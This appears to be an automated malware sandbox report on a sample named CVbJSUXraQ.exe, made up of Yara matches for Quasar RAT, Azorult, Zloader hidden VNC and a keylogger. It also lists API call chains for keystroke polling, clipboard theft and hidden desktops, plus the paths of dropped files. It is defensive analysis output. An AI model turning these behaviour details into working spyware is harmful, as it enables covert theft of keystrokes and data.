Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: dropped/vnc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 1_2_00DB2344
Contains functionality to read data from the clipboard
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard, 5_2_00C83CC0
Contains functionality to read the clipboard data
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C83A94 GetWindowLongPtrA,SendNotifyMessageA,GetClipboardOwner,OpenClipboard,GetClipboardData,GlobalLock,lstrlenA,lstrlenA,HeapAlloc,lstrlenA,lstrlenA,HeapFree,GlobalUnlock,CloseClipboard,SendNotifyMessageA,SetWindowLongPtrA,DefWindowProcA, 5_2_00C83A94
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_00E3CABC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 7_2_00E3CABC
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00ACCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 10_2_00ACCABC

E-Banking Fraud:

Yara detected Quasar RAT
Source: Yara match File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match File source: dropped/windef.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7D800 CreateDesktopA,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,lstrcpyA,CloseDesktop, 5_2_00C7D800

System Summary:

Malicious sample detected (through community Yara rule)
Source: CVbJSUXraQ.exe, type: SAMPLE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
